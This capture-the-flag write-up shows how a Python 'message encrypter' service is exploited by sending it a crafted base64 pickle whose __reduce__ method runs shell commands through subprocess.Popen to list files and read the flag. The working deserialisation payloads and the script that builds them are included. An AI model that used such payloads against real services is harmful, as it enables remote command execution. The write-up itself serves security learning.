Rating:
We connect to the service. We encrypt the string qq and decode it.
```
$ nc cha.hackpack.club 41704
[*] Welcome to our Super Secure Message Encrypter (SSME - copyright pending)
[*] We use patented technology that only we have access to in order to safely encrypt your data
[*] Please use this tool to encrypt/decrypt messages
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 1
What would you like to encrypt? qq
[+] Message encrypted: gANYAgAAAHFxcQAu
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 2
Please enter the encrypted string here: gANYAgAAAHFxcQAu
[+] Message decrypted: qq
```
Then we send a malformed input for the decryption, that generate an error:
```
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 2
Please enter the encrypted string here: gANYAgAAAHFxc
Traceback (most recent call last):
File "/usr/lib/python3.6/encodings/base64_codec.py", line 19, in base64_decode
return (base64.decodebytes(input), len(input))
Fle "/usr/lib/python3.6/base64.py", line 546, in decodebytes
return binascii.a2b_base64(s)
binascii.Error: Incorrect padding
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/home/challenger/app.py", line 46, in <module>
main()
File "/home/challenger/app.py", line 37, in main
dec = decrypt(to_dec)
File "/home/challenger/app.py", line 24, in decrypt
return pickle.loads(codecs.decode(to_dec.encode(), "base64"))
binascii.Error: decoding with 'base64' codec failed (Error: Incorrect padding)i
```
The error disclose the use of the python pickle which are know to be vulnerable an allowing command execution.
We create a pickle to execute OS commands on the system:
```
>>> import pickle
>>> import subprocess
>>> import base64
>>>
>>> class RunBinSh(object):
... def __reduce__(self):
... return (subprocess.Popen, (('ls',),))
...
>>> print base64.b64encode(cPickle.dumps(RunBinSh()))
b'gASVIwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwCbHOUhZSFlFKULg=='
```
We decode the generate pickle
```
$ nc cha.hackpack.club 41704
[*] Welcome to our Super Secure Message Encrypter (SSME - copyright pending)
[*] We use patented technology that only we have access to in order to safely encrypt your data
[*] Please use this tool to encrypt/decrypt messages
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 2
Please enter the encrypted string here: gASVIwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwCbHOUhZSFlFKULg==
[+] Message decrypted: <subprocess.Popen object at 0x7f2b6d9a9550>
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> app.py
flag.txt
```
We generate a new pickle to read the flag:
```
>>> class RunBinSh(object):
... def __reduce__(self):
... return (subprocess.Popen, (('cat', 'flag.txt',),))
...
>>> print(base64.b64encode(pickle.dumps(RunBinSh())))
b'gASVLwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwIZmxhZy50eHSUhpSFlFKULg=='
Please enter the encrypted string here: gASVLwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwIZmxhZy50eHSUhpSFlFKULg==
[+] Message decrypted: <subprocess.Popen object at 0x7f2b6d9a4438>
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> flag{n3v3R_u$e_p!ckLe_w_uNtru$t3d_d4t4}
```
